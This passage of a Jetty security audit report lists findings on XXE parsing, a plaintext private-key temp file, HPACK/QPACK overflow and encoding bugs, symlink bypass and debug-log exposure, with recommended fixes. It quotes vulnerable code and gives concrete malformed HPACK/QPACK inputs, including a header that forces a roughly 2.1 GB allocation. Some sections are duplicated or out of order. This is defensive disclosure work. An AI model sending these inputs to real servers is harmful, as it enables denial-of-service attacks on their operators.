Assessment 19. XML external entities and entity expansion in Maven package metadata parser Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-19 Target: org.eclipse.jetty.start.fileinits.MavenMetadata Description During module initialization, the MavenMetadata class parses maven-metadata.xml files when the module configuration includes a maven:// URI in its [files] section. The DocumentBuilderFactory class is used with its default settings, meaning that document type definitions (DTD) are allowed and are applied. This behavior leaves the MavenMetadata class vulnerable to XML external entity (XXE) and XML entity expansion (XEE) attacks. These vulnerabilities could enable a variety of exploits, including server-side request forgery on the server’s local network and arbitrary file reads from the server’s filesystem. Exploit Scenario An attacker causes a Jetty installation to parse a maliciously crafted maven-metadata.xml file, such as by uploading a malicious package to a Maven repository, inducing an out-of-band download of the malicious package through social engineering, or by placing the maven-metadata.xml file on the server’s filesystem through other means. When the XML file is parsed, the XML-based attack is launched. 
Exploit Scenario
An attacker causes a Jetty installation to parse a maliciously crafted maven-metadata.xml file, such as by uploading a malicious package to a Maven repository, inducing an out-of-band download of the malicious package through social engineering, or by placing the maven-metadata.xml file on the server's filesystem through other means. When the XML file is parsed, the XML-based attack is launched. The attacker could leverage this vector to do any of the following:
● Induce HTTP requests to servers on the server's local network
● Read and exfiltrate arbitrary files on the server's filesystem
● Consume excessive system resources with an XEE, causing a denial of service

Recommendations
Short term, disable parsing of DTDs in MavenMetadata so that maven-metadata.xml files cannot be used as a vector for XML-based attacks. Disabling DTDs may require knowledge of the underlying XML parser implementation returned by the DocumentBuilderFactory class.
Long term, review default configurations and attributes supported by XML parsers that may be returned by the DocumentBuilderFactory to ensure that DTDs are properly disabled.

20. Use of deprecated AccessController class
Severity: Informational
Difficulty: N/A
Type: Code Quality
Finding ID: TOB-JETTY-20
Target:
● org.eclipse.jetty.logging.JettyLoggerConfiguration
● org.eclipse.jetty.util.MemoryUtils
● org.eclipse.jetty.util.TypeUtil
● org.eclipse.jetty.util.thread.PrivilegedThreadFactory
● org.eclipse.jetty.ee10.servlet.ServletContextHandler
● org.eclipse.jetty.ee9.nested.ContextHandler

Description
The classes listed in the "Target" cell above use the java.security.AccessController class, which is a deprecated class slated to be removed in a future Java release. The java.security library documentation states that the AccessController class "is only useful in conjunction with the Security Manager," which is also deprecated. Thus, the use of AccessController no longer serves any beneficial purpose. The use of this deprecated class could impact Jetty's compatibility with future releases of the Java SDK.

Recommendations
Short term, remove all uses of the AccessController class.
Long term, audit the Jetty codebase for the use of classes in the java.security package that may not provide any value in Jetty 12, and remove all references to those classes.

21. QUIC server writes SSL private key to temporary plaintext file
Severity: High
Difficulty: High
Type: Cryptography
Finding ID: TOB-JETTY-21
Target: org.eclipse.jetty.quic.server.QuicServerConnector

Description
Jetty's QUIC implementation uses quiche, a QUIC and HTTP/3 library maintained by Cloudflare. When the server's SSL certificate is handed off to quiche, the private key is extracted from the existing keystore and written to a temporary plaintext PEM file:

protected void doStart() throws Exception
{
    // ...[snip]...
    char[] keyStorePassword = sslContextFactory.getKeyStorePassword().toCharArray();
    String keyManagerPassword = sslContextFactory.getKeyManagerPassword();
    SSLKeyPair keyPair = new SSLKeyPair(
        sslContextFactory.getKeyStoreResource().getPath(),
        sslContextFactory.getKeyStoreType(),
        keyStorePassword,
        alias,
        keyManagerPassword == null ? keyStorePassword : keyManagerPassword.toCharArray()
    );
    File[] pemFiles = keyPair.export(new File(System.getProperty("java.io.tmpdir")));
    privateKeyFile = pemFiles[0];
    certificateChainFile = pemFiles[1];
}

Figure 21.1: QuicServerConnector.java, lines 154–179

Storing the private key in this manner exposes it to increased risk of theft. Although the QuicServerConnector class deletes the private key file upon stopping the server, this deleted file may not be immediately removed from the physical storage medium, exposing the file to potential theft by attackers who can access the raw bytes on the disk.
A review of quiche suggests that the library's API may not support reading a DES-encrypted keyfile. If that is true, then remediating this issue would require updates to the underlying quiche library.

Exploit Scenario
An attacker gains read access to a Jetty HTTP/3 server's temporary directory while the server is running. The attacker can retrieve the temporary keyfile and read the private key without needing to obtain or guess the encryption key for the original keystore. With this private key in hand, the attacker decrypts and tampers with all TLS communications that use the associated certificate.

Recommendations
Short term, investigate the quiche library's API to determine whether it can readily support password-encrypted private keyfiles. If so, update Jetty to save the private key in a temporary password-protected file and to forward that password to quiche. Alternatively, if quiche can accept a key directly, have Jetty pass the unencrypted private key to quiche as a function argument rather than through the filesystem. Either option would obviate the need to store the key in a plaintext file on the server's filesystem. If quiche does not support either of these changes, open an issue or pull request for quiche to implement a fix for this issue.

22. Repeated code between HPACK and QPACK
Severity: Informational
Difficulty: N/A
Type: Code Quality
Finding ID: TOB-JETTY-22
Target:
● org.eclipse.jetty.http2.hpack.internal.NBitInteger
● org.eclipse.jetty.http2.hpack.internal.Huffman
● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerParser
● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerEncoder
● org.eclipse.jetty.http3.qpack.internal.util.HuffmanDecoder
● org.eclipse.jetty.http3.qpack.internal.util.HuffmanEncoder

Description
Classes for dealing with n-bit integers and Huffman coding are implemented both in the jetty-http2-hpack and in jetty-http3-qpack libraries. These classes have very similar functionality but are implemented in two different places, sometimes with identical code and other times with different implementations. In some cases (TOB-JETTY-9), one implementation has a bug that the other implementation does not have. The codebase would be easier to maintain and keep secure if the implementations were merged.

Exploit Scenario
A vulnerability is found in the Huffman encoding implementation, which has identical code in HPACK and QPACK. The vulnerability is fixed in one implementation but not the other, leaving one of the implementations vulnerable.

Recommendations
Short term, merge the two implementations of n-bit integers and Huffman coding classes.
Long term, audit the Jetty codebase for other classes with very similar functionality.

23. Various exceptions in HpackDecoder.decode and QpackDecoder.decode
Severity: Informational
Difficulty: N/A
Type: Denial of Service
Finding ID: TOB-JETTY-23
Target: org.eclipse.jetty.http2.hpack.HpackDecoder, org.eclipse.jetty.http3.qpack.QpackDecoder

Description
The HpackDecoder and QpackDecoder classes both throw unexpected Java-level exceptions:
● HpackDecoder.decode(0x03) throws BufferUnderflowException.
● HpackDecoder.decode(0x4800) throws NumberFormatException.
● HpackDecoder.decode(0x3fff 2e) throws IllegalArgumentException.
● HpackDecoder.decode(0x3fff 81ff ff2e) throws NullPointerException.
● HpackDecoder.decode(0xffff ffff f8ff ffff ffff ffff ffff ffff ffff ffff ffff ffff 0202 0000) throws ArrayIndexOutOfBoundsException.
● QpackDecoder.decode(..., 0x81, ...) throws IndexOutOfBoundsException.
● QpackDecoder.decode(..., 0xfff8 ffff f75b, ...) throws ArithmeticException.
For both HPACK and QPACK, these exceptions appear to be caught higher up in the call chain by catch (Throwable x) statements every time the decode functions are called. However, catching them within decode and throwing a Jetty-level exception within the catch statement would result in cleaner, more robust code.

Exploit Scenario
Jetty developers refactor the codebase, moving function calls around and introducing a new point in the code where HpackDecoder.decode is called. Assuming that decode will throw only org.jetty… errors, they forget to wrap this call in a catch (Throwable x) statement. This results in a DoS vulnerability.

Recommendations
Short term, document in the code that Java-level exceptions can be thrown.
Long term, modify the decode functions so that they throw only Jetty-level exceptions.
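One way to realize the long-term recommendation is to wrap the existing decode body and translate stray runtime exceptions at the boundary. A sketch, with decodeInternal standing in for the current implementation and the signature abbreviated:

public MetaData decode(ByteBuffer buffer) throws HpackException
{
    try
    {
        return decodeInternal(buffer); // hypothetical: the existing decode body
    }
    catch (HpackException x)
    {
        throw x; // already a Jetty-level exception
    }
    catch (RuntimeException x)
    {
        // BufferUnderflowException, NumberFormatException, NullPointerException,
        // and the other exceptions listed above all extend RuntimeException;
        // surface them as a single protocol-level error instead.
        throw new HpackException.SessionException("Malformed HPACK input: %s", x.toString());
    }
}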
24. Incorrect QPACK encoding when multi-byte characters are used
Severity: Medium
Difficulty: Medium
Type: Data Validation
Finding ID: TOB-JETTY-24
Target: org.eclipse.jetty.http3.qpack.internal.EncodableEntry

Description
Java's string.length() function returns the number of characters in a string, which can be different from the number of bytes returned by the string.getBytes() function. However, QPACK encoding methods assume that they return the same number, which could cause incorrect encodings. In EncodableEntry.LiteralEntry, which is used to encode HTTP/3 header fields, the following method is used for encoding:

214    public void encode(ByteBuffer buffer, int base)
215    {
216        byte allowIntermediary = 0x00; // TODO: this is 0x10 bit, when should this be set?
217        String name = getName();
218        String value = getValue();
219
220        // Encode the prefix code and the name.
221        if (_huffman)
222        {
223            buffer.put((byte)(0x28 | allowIntermediary));
224            NBitIntegerEncoder.encode(buffer, 3, HuffmanEncoder.octetsNeeded(name));
225            HuffmanEncoder.encode(buffer, name);
226            buffer.put((byte)0x80);
227            NBitIntegerEncoder.encode(buffer, 7, HuffmanEncoder.octetsNeeded(value));
228            HuffmanEncoder.encode(buffer, value);
229        }
230        else
231        {
232            // TODO: What charset should we be using? (this applies to the instruction generators as well).
233            buffer.put((byte)(0x20 | allowIntermediary));
234            NBitIntegerEncoder.encode(buffer, 3, name.length());
235            buffer.put(name.getBytes());
236            buffer.put((byte)0x00);
237            NBitIntegerEncoder.encode(buffer, 7, value.length());
238            buffer.put(value.getBytes());
239        }
240    }

Figure 24.1: EncodableEntry.java, lines 214–240

Note in particular lines 232–238, which are used to encode literal (non-Huffman-coded) names and values. The value returned by name.length() is added to the bytestring, followed by the value returned by name.getBytes(). Then, the value returned by value.length() is added to the bytestring, followed by the value returned by value.getBytes(). When this bytestring is decoded, the decoder will read the name length field and then read that many bytes as the name. If multibyte characters were used in the name field, the decoder will read too few bytes. The rest of the bytestring will also be decoded incorrectly, since the decoder will continue reading at the wrong point in the bytestring. The same issue occurs if multibyte characters were used in the value field.

The same issue appears in EncodableEntry.ReferencedNameEntry.encode:

164        // Encode the value.
165        String value = getValue();
166        if (_huffman)
167        {
168            buffer.put((byte)0x80);
169            NBitIntegerEncoder.encode(buffer, 7, HuffmanEncoder.octetsNeeded(value));
170            HuffmanEncoder.encode(buffer, value);
171        }
172        else
173        {
174            buffer.put((byte)0x00);
175            NBitIntegerEncoder.encode(buffer, 7, value.length());
176            buffer.put(value.getBytes());
177        }

Figure 24.2: EncodableEntry.java, lines 164–177

If value has multibyte characters, it will be incorrectly encoded in lines 174–176.

Jetty's HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready.

Exploit Scenario
A Jetty server attempts to add the Set-Cookie header, setting a cookie value to a UTF-8-encoded string that contains multibyte characters. This causes an incorrect cookie value to be set and the rest of the headers in this message to be parsed incorrectly.

Recommendations
Short term, have the encode function in both EncodableEntry.LiteralEntry and EncodableEntry.ReferencedNameEntry encode the length of the string using the length of string.getBytes() rather than string.length().

25. No limits on maximum capacity in QPACK decoder
Severity: High
Difficulty: Medium
Type: Denial of Service
Finding ID: TOB-JETTY-25
Target:
● org.eclipse.jetty.http3.qpack.QpackDecoder
● org.eclipse.jetty.http3.qpack.internal.parser.DecoderInstructionParser
● org.eclipse.jetty.http3.qpack.internal.table.DynamicTable

Description
In QPACK, an encoder can set the dynamic table capacity of the decoder using a "Set Dynamic Table Capacity" instruction. The HTTP/3 specification requires that the capacity be no larger than the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit chosen by the decoder. However, nowhere in the QPACK code is this limit checked. This means that the encoder can choose whatever capacity it wants (up to Java's maximum integer value), allowing it to take up large amounts of space in the decoder's memory.

Jetty's HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready.

Exploit Scenario
A Jetty server supporting QPACK is running. An attacker opens a connection to the server. He sends a "Set Dynamic Table Capacity" instruction, setting the dynamic table capacity to Java's maximum integer value, 2^31 - 1 (about 2.1 GB). He then repeatedly enters very large values into the server's dynamic table using an "Insert with Literal Name" instruction until the full 2.1 GB capacity is taken up. The attacker repeats this using multiple connections until the server runs out of memory and crashes.

Recommendations
Short term, enforce the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit on the capacity.
Long term, audit Jetty's implementation of QPACK and other protocols to ensure that Jetty enforces limits as required by the standards.
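A sketch of the missing bounds check follows; all names are hypothetical, and RFC 9204 prescribes treating the violation as a connection error of type QPACK_ENCODER_STREAM_ERROR.

// Hypothetical handler for a "Set Dynamic Table Capacity" instruction.
void onSetDynamicTableCapacity(long capacity)
{
    // Enforce the limit the decoder advertised in its settings.
    if (capacity < 0 || capacity > _maxTableCapacity)
        throw new IllegalArgumentException(
            "QPACK_ENCODER_STREAM_ERROR: capacity " + capacity +
            " exceeds SETTINGS_QPACK_MAX_TABLE_CAPACITY " + _maxTableCapacity);
    _dynamicTable.setCapacity((int)capacity);
}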
Risk of integer overflow in HPACK's NBitInteger.decode Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-9 Target: org.eclipse.jetty.http2.hpack.internal.NBitInteger Description The static function NBitInteger.decode is used to decode bytestrings in HPACK's integer format. It should return only positive integers since HPACK’s integer format is not intended to support negative numbers. However, the following loop in NBitInteger.decode is susceptible to integer overflows in its multiplication and addition operations: public static int decode (ByteBuffer buffer, int n) { if (n == 8 ) { // ... } int nbits = 0xFF >>> ( 8 - n); int i = buffer.get(buffer.position() - 1 ) & nbits; if (i == nbits) { int m = 1 ; int b; do { b = 0xff & buffer.get(); i = i + (b & 127 ) * m; m = m * 128 ; } while ((b & 128 ) == 128 ); } return i; } Figure 9.1: NBitInteger.java , lines 105–145 For example, NBitInteger.decode(0xFF8080FFFF0F, 7) returns -16257 . Any overflow that occurs in the function would not be a problem on its own since, in general, the output of this function ought to be validated before it is used; however, when coupled with other issues (refer to TOB-JETTY-10 ), an overflow can cause vulnerabilities. 49 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, modify NBitInteger.decode to check that its result is nonnegative before returning it. Long term, consider merging the QPACK and HPACK implementations for NBitInteger , since they perform the same functionality; the QPACK implementation of NBitInteger checks for overflows. 50 OSTIF Eclipse: Jetty Security Assessment +10. MetaDataBuilder.checkSize accepts headers of negative lengths Severity: Medium Difficulty: High Type: Denial of Service Finding ID: TOB-JETTY-10 Target: org.eclipse.jetty.http2.hpack.internal.MetaDataBuilder Description The MetaDataBuilder.checkSize function accepts user-entered HPACK header values of negative sizes, which could cause a very large buffer to be allocated later when the user-entered size is multiplied by 2. MetaDataBuilder.checkSize determines whether a header name or value exceeds the size limit and throws an exception if the limit is exceeded: public void checkSize ( int length, boolean huffman) throws SessionException { // Apply a huffman fudge factor if (huffman) length = (length * 4 ) / 3 ; if ((_size + length) > _maxSize) throw new HpackException.SessionException( "Header too large %d > %d" , _size + length, _maxSize); } Figure 10.1: MetaDataBuilder.java , lines 291–298 However, it does not throw an exception if the size is negative. Later, the Huffman.decode function multiplies the user-entered length by 2 before allocating a buffer: public static String decode (ByteBuffer buffer, int length) throws HpackException.CompressionException { Utf8StringBuilder utf8 = new Utf8StringBuilder(length * 2 ); // ... Figure 10.2: Huffman.java , lines 357–359 This means that if a user provides a negative length value (or, more precisely, a length value that becomes negative when multiplied by the 4/3 fudge factor), and this length value becomes a very large positive number when multiplied by 2, then the user can cause a very large buffer to be allocated on the server. 51 OSTIF Eclipse: Jetty Security Assessment Exploit Scenario An attacker repeatedly sends HTTP messages with the HPACK header 0x00ff8080ffff0b . Each time this header is decoded, the following occurs: ● HpackDecode.decode determines that a Huffman-coded value of length -1073758081 needs to be decoded. 
+10. MetaDataBuilder.checkSize accepts headers of negative lengths
Severity: Medium Difficulty: High Type: Denial of Service Finding ID: TOB-JETTY-10
Target: org.eclipse.jetty.http2.hpack.internal.MetaDataBuilder

Description
The MetaDataBuilder.checkSize function accepts user-entered HPACK header values of negative sizes, which could cause a very large buffer to be allocated later when the user-entered size is multiplied by 2.

MetaDataBuilder.checkSize determines whether a header name or value exceeds the size limit and throws an exception if the limit is exceeded:

public void checkSize(int length, boolean huffman) throws SessionException
{
    // Apply a huffman fudge factor
    if (huffman)
        length = (length * 4) / 3;
    if ((_size + length) > _maxSize)
        throw new HpackException.SessionException("Header too large %d > %d", _size + length, _maxSize);
}

Figure 10.1: MetaDataBuilder.java, lines 291–298

However, it does not throw an exception if the size is negative. Later, the Huffman.decode function multiplies the user-entered length by 2 before allocating a buffer:

public static String decode(ByteBuffer buffer, int length) throws HpackException.CompressionException
{
    Utf8StringBuilder utf8 = new Utf8StringBuilder(length * 2);
    // ...

Figure 10.2: Huffman.java, lines 357–359

This means that if a user provides a negative length value (or, more precisely, a length value that becomes negative when multiplied by the 4/3 fudge factor), and this length value becomes a very large positive number when multiplied by 2, then the user can cause a very large buffer to be allocated on the server.

Exploit Scenario
An attacker repeatedly sends HTTP messages with the HPACK header 0x00ff8080ffff0b. Each time this header is decoded, the following occurs:
● HpackDecoder.decode determines that a Huffman-coded value of length -1073758081 needs to be decoded.
● MetaDataBuilder.checkSize approves this length.
● The number is multiplied by 2, resulting in 2147451134, and Huffman.decode allocates a 2.1 GB string array.
● Huffman.decode experiences a buffer overflow error, and the array is deallocated the next time garbage collection happens. (Note that this deallocation can be delayed by adding valid Huffman-coded characters to the end of the header.)

Depending on the timing of garbage collection, the number of threads, and the amount of memory available on the server, this may cause the server to run out of memory.

Recommendations
Short term, have MetaDataBuilder.checkSize check that the given length is nonnegative directly before adding it to _size and comparing it with _maxSize.

Long term, add checks for integer overflows in Huffman.decode and in NBitInteger.decode (refer to TOB-JETTY-9) for added redundancy.
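A minimal sketch of the short-term fix, reusing the exception type already thrown in figure 10.1 (the message wording is illustrative):

public void checkSize(int length, boolean huffman) throws SessionException
{
    // Reject negative lengths before any arithmetic is performed.
    if (length < 0)
        throw new HpackException.SessionException("Bad header length %d", length);
    // Apply a huffman fudge factor
    if (huffman)
        length = (length * 4) / 3;
    // The fudge factor itself can overflow for very large lengths, so re-check.
    if (length < 0 || (_size + length) > _maxSize)
        throw new HpackException.SessionException("Header too large %d > %d", _size + length, _maxSize);
}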
11. Insufficient space allocated when encoding QPACK instructions and entries
Severity: Low Difficulty: High Type: Denial of Service Finding ID: TOB-JETTY-11
Target:
● org.eclipse.jetty.http3.qpack.internal.instruction.IndexedNameEntryInstruction
● org.eclipse.jetty.http3.qpack.internal.instruction.LiteralNameEntryInstruction
● org.eclipse.jetty.http3.qpack.internal.instruction.EncodableEntry

Description
Multiple expressions do not allocate enough buffer space when encoding QPACK instructions and entries, which could result in a buffer overflow exception.

In IndexedNameEntry, the following expression determines how much space to allocate when encoding the instruction:

int size = NBitIntegerEncoder.octetsNeeded(6, _index) + (_huffman ? HuffmanEncoder.octetsNeeded(_value) : _value.length()) + 2;

Figure 11.1: IndexedNameEntry.java, line 58

Later, the following two lines encode the value size for Huffman-coded and non-Huffman-coded strings, respectively:

NBitIntegerEncoder.encode(byteBuffer, 7, HuffmanEncoder.octetsNeeded(_value));
// ...
NBitIntegerEncoder.encode(byteBuffer, 7, _value.length());

Figure 11.2: IndexedNameEntry.java, lines 71 and 77

These encodings can take up more than 1 byte if the value's length is over 126, because the number will fill up the 7 bits given to it in the first byte. However, the int size expression in figure 11.1 assumes that it will take up only 1 byte. Thus, if the value's length is over 126, too few bytes may be allocated for the instruction, causing a buffer overflow.

The same problem occurs in LiteralNameEntryInstruction:

int size = (_huffmanName ? HuffmanEncoder.octetsNeeded(_name) : _name.length()) +
    (_huffmanValue ? HuffmanEncoder.octetsNeeded(_value) : _value.length()) + 2;

Figure 11.3: LiteralNameEntryInstruction.java, lines 59–60

This expression assumes that the name's length will fit into 5 bits and that the value's length will fit into 7 bits. If the name's length is over 30 bytes or the value's length is over 126 bytes, these assumptions will be false and too little space may be allocated for the instruction, which could cause a buffer overflow.

A similar problem occurs in EncodableEntry.ReferencedNameEntry. The getRequiredSize method in this file calculates how much space should be allocated for its encoding:

public int getRequiredSize(int base)
{
    String value = getValue();
    int relativeIndex = _nameEntry.getIndex() - base;
    int valueLength = _huffman ? HuffmanEncoder.octetsNeeded(value) : value.length();
    return 1 + NBitIntegerEncoder.octetsNeeded(4, relativeIndex) + 1 + NBitIntegerEncoder.octetsNeeded(7, valueLength) + valueLength;
}

Figure 11.4: EncodableEntry.java, lines 181–187

The method returns the wrong size if the value is longer than 126 bytes. Additionally, it assumes that the name will use a post-base reference rather than a normal one, which may be incorrect.

An additional problem is present in this method. It assumes that value's length in bytes will be returned by value.length(). However, value.length() measures the number of characters in value, not the number of bytes, so if value contains multibyte characters (e.g., UTF-8), too few bytes will be allocated. The length of value should be calculated by using value.getBytes() instead of value.length().

The getRequiredSize method in EncodableEntry.LiteralEntry also incorrectly uses value.length():

public int getRequiredSize(int base)
{
    String name = getName();
    String value = getValue();
    int nameLength = _huffman ? HuffmanEncoder.octetsNeeded(name) : name.length();
    int valueLength = _huffman ? HuffmanEncoder.octetsNeeded(value) : value.length();
    return 2 + NBitIntegerEncoder.octetsNeeded(3, nameLength) + nameLength + NBitIntegerEncoder.octetsNeeded(7, valueLength) + valueLength;
}

Figure 11.5: EncodableEntry.java, lines 243–250

Note that name.length() is used to measure the byte length of name, and value.length() is used to measure the byte length of value.

Jetty's HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready.

Recommendations
Short term, change the relevant expressions to account for the extra length.

Long term, build out additional test cases for QPACK and other parsers used in HTTP/3 to test for the correct handling of edge cases and identify memory handling exceptions.
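As one illustration of the short-term fix, applied to figure 11.5: the sketch below measures non-Huffman strings in bytes rather than characters and keeps the existing NBitIntegerEncoder.octetsNeeded calls for the variable-width length prefixes. Whether this is the exact shape the Jetty maintainers would choose is an assumption of this sketch:

public int getRequiredSize(int base)
{
    String name = getName();
    String value = getValue();
    // getBytes().length counts bytes; length() counts characters and
    // undercounts multibyte (e.g., UTF-8) strings.
    int nameLength = _huffman ? HuffmanEncoder.octetsNeeded(name) : name.getBytes().length;
    int valueLength = _huffman ? HuffmanEncoder.octetsNeeded(value) : value.getBytes().length;
    return 2 + NBitIntegerEncoder.octetsNeeded(3, nameLength) + nameLength
             + NBitIntegerEncoder.octetsNeeded(7, valueLength) + valueLength;
}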
12. LiteralNameEntryInstruction incorrectly encodes value length
Severity: Medium Difficulty: Medium Type: Denial of Service Finding ID: TOB-JETTY-12
Target: org.eclipse.jetty.http3.qpack.internal.instruction.LiteralNameEntryInstruction

Description
QPACK instructions for inserting entries with literal names and non-Huffman-coded values will be encoded incorrectly when the value's length is over 30, which could cause values to be sent incorrectly or errors to occur during decoding.

The following snippet of the LiteralNameEntryInstruction.encode function is responsible for encoding the header value:

78  if (_huffmanValue)
79  {
80      byteBuffer.put((byte)(0x80));
81      NBitIntegerEncoder.encode(byteBuffer, 7, HuffmanEncoder.octetsNeeded(_value));
82      HuffmanEncoder.encode(byteBuffer, _value);
83  }
84  else
85  {
86      byteBuffer.put((byte)(0x00));
87      NBitIntegerEncoder.encode(byteBuffer, 5, _value.length());
88      byteBuffer.put(_value.getBytes());
89  }

Figure 12.1: LiteralNameEntryInstruction.java, lines 78–89

On line 87, 5 is the second parameter to NBitIntegerEncoder.encode, indicating that the number will take up 5 bits in the first encoded byte; however, the second parameter should be 7 instead. This means that when _value.length() is over 30, it will be incorrectly encoded.

Jetty's HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready.

Recommendations
Short term, change the second parameter of the NBitIntegerEncoder.encode call on line 87 from 5 to 7 to reflect that the number will take up 7 bits.

Long term, write more tests to catch similar encoding/decoding problems.

13. FileInitializer does not check for symlinks
Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-13
Target: org.eclipse.jetty.start.FileInitializer

Description
Module configuration files can direct Jetty to download a remote file and save it in the local filesystem while initializing the module. During this process, the FileInitializer class validates the destination path and throws an IOException exception if the destination is outside the ${jetty.base} directory. However, this validation routine does not check for symlinks:

// now on copy/download paths (be safe above all else)
if (destination != null && !destination.startsWith(_basehome.getBasePath()))
    throw new IOException("For security reasons, Jetty start is unable to process file resource not in ${jetty.base} - " + location);

Figure 13.1: FileInitializer.java, lines 112–114

None of the subclasses of FileInitializer check for symlinks either. Thus, if the ${jetty.base} directory contains a symlink, a file path in a module's .ini file beginning with the symlink name will pass the validation check, and the file will be written to a subdirectory of the symlink's destination.

Exploit Scenario
A system's ${jetty.base} directory contains a symlink called dir, which points to /etc. The system administrator enables a Jetty module whose .ini file contains a [files] entry that downloads a remote file and writes it to the relative path dir/config.conf. The filesystem follows the symlink and writes a new configuration file to /etc/config.conf, which impacts the server's system configuration. Additionally, since the FileInitializer class uses the REPLACE_EXISTING flag, this behavior overwrites an existing system configuration file.

Recommendations
Short term, rewrite all path checks in FileInitializer and its subclasses to include a call to the Path.toRealPath function, which, by default, will resolve symlinks and produce the real filesystem path pointed to by the Path object. If this real path is outside ${jetty.base}, the file write operation should fail.

Long term, consolidate all filesystem operations involving the ${jetty.base} or ${jetty.home} directories into a single centralized class that automatically performs symlink resolution and rejects operations that attempt to read from or write to an unauthorized directory. This class should catch and handle the IOException exception that is thrown in the event of a link loop or a large number of nested symlinks.
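A sketch of the short-term fix, applied to the check in figure 13.1. It assumes the destination's parent directory already exists; a complete fix would canonicalize the nearest existing ancestor before comparing:

// Resolve symlinks before the containment check.
Path realBase = _basehome.getBasePath().toRealPath();
// The destination file may not exist yet, so canonicalize its parent.
Path realParent = destination.getParent().toRealPath();
if (!realParent.resolve(destination.getFileName()).startsWith(realBase))
    throw new IOException("For security reasons, Jetty start is unable to process file resource not in ${jetty.base} - " + location);

Note that toRealPath throws IOException on a link loop or an excessive chain of symlinks, which fits the error handling the long-term recommendation calls for.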
14. FileInitializer permits downloading files via plaintext HTTP
Severity: High Difficulty: High Type: Data Exposure Finding ID: TOB-JETTY-14
Target: org.eclipse.jetty.start.FileInitializer

Description
Module configuration files can direct Jetty to download a remote file and save it in the local filesystem while initializing the module. If the specified URL is a plaintext HTTP URL, Jetty does not raise an error or warn the user. Transmitting files over plaintext HTTP is intrinsically insecure and exposes sensitive data to tampering and eavesdropping in transit.

Exploit Scenario
A system administrator enables a Jetty module that downloads a remote file over plaintext HTTP during initialization. An attacker with a network intermediary position sniffs the traffic and infers sensitive information about the design and configuration of the Jetty system under configuration. Alternatively, the attacker actively tampers with the file during transmission from the remote server to the Jetty installation, which enables the attacker to alter the module's behavior and launch other attacks against the targeted system.

Recommendations
Short term, add a check to the FileInitializer class and its subclasses to prohibit downloads over plaintext HTTP. Additionally, add a validation check to the module .ini file parser to reject any configuration that includes a plaintext HTTP URL in the [files] section.

Long term, consolidate all remote file downloads conducted during module configuration operations into a single centralized class that automatically rejects plaintext HTTP URLs. If current use cases require support of plaintext HTTP URLs, then at a minimum, have Jetty display a prominent warning message and prompt the user for manual confirmation before performing the unencrypted download.

15. NullPointerException thrown by FastCGI parser on invalid frame type
Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-JETTY-15
Target: org.eclipse.jetty.fcgi.parser.Parser

Description
Because of a missing null check, the Jetty FastCGI client's Parser class throws a NullPointerException exception when parsing a frame with an invalid frame type field. This exception occurs because the findContentParser function returns null when it does not have a ContentParser object matching the specified frame type, and the caller never checks the findContentParser return value for null before dereferencing it.

case CONTENT:
{
    ContentParser contentParser = findContentParser(headerParser.getFrameType());
    if (headerParser.getContentLength() == 0)
    {
        padding = headerParser.getPaddingLength();
        state = State.PADDING;
        if (contentParser.noContent())
            return true;
    }
    else
    {
        ContentParser.Result result = contentParser.parse(buffer);
        // ...[snip]...
    }
    break;
}

Figure 15.1: Parser.java, lines 82–114

Exploit Scenario
An attacker operates a malicious web server that supports FastCGI. A Jetty application communicates with this server by using Jetty's built-in FastCGI client. The remote server transmits a frame with an invalid frame type, causing a NullPointerException exception and a crash in the Jetty application.

Recommendations
Short term, add a null check to the parse function to abort the parsing process before dereferencing a null return value from findContentParser. If a null value is detected, parse should throw an appropriate exception, such as IllegalStateException, that Jetty can catch and handle safely.

Long term, build out a larger suite of test cases that ensures graceful handling of malformed traffic and data.
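A sketch of the recommended null check, spliced into the snippet from figure 15.1 and using the IllegalStateException suggested above (the message text is illustrative):

case CONTENT:
{
    ContentParser contentParser = findContentParser(headerParser.getFrameType());
    // Fail fast on unknown frame types instead of dereferencing null below.
    if (contentParser == null)
        throw new IllegalStateException("Invalid FastCGI frame type: " + headerParser.getFrameType());
    if (headerParser.getContentLength() == 0)
    {
        padding = headerParser.getPaddingLength();
        state = State.PADDING;
        if (contentParser.noContent())
            return true;
    }
    else
    {
        ContentParser.Result result = contentParser.parse(buffer);
        // ...[snip]...
    }
    break;
}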
16. Documentation does not specify that request contents and other user data can be exposed in debug logs
Severity: Medium Difficulty: High Type: Data Exposure Finding ID: TOB-JETTY-16
Target: Jetty 12 Operations Guide; numerous locations throughout the codebase

Description
Over 100 times, the system calls LOG.debug with a parameter of the format BufferUtil.toDetailString(buffer), which outputs up to 56 bytes of the buffer into the log file. Jetty's implementations of various protocols and encodings, including GZIP, WebSocket, multipart encoding, and HTTP/2, output user data received over the network to the debug log using this type of call. An example instance from Jetty's WebSocket implementation appears in figure 16.1.

public Frame.Parsed parse(ByteBuffer buffer) throws WebSocketException
{
    try
    {
        // parse through
        while (buffer.hasRemaining())
        {
            if (LOG.isDebugEnabled())
                LOG.debug("{} Parsing {}", this, BufferUtil.toDetailString(buffer));
            // ...[snip]...
        }
        // ...[snip]...
    }
    // ...[snip]...
}

Figure 16.1: Parser.java, lines 88–96

Although the Jetty 12 Operations Guide does state that Jetty debugging logs can quickly consume massive amounts of disk space, it does not advise system administrators that the logs can contain sensitive user data, such as personally identifiable information. Thus, the possibility of raw traffic being captured from debug logs is undocumented.

Exploit Scenario
A Jetty system administrator turns on debug logging in a production environment. During the normal course of operation, a user sends traffic containing sensitive information, such as personally identifiable information or financial data, and this data is recorded to the debug log. An attacker who gains access to this log can then read the user data, compromising data confidentiality and the user's privacy rights.

Recommendations
Short term, update the Jetty Operations Guide to state that in addition to being extremely large, debug logs can contain sensitive user data and should be treated as sensitive.

Long term, consider moving all debugging messages that contain buffer excerpts into a high-detail debug log that is enabled only for debug builds of the application.

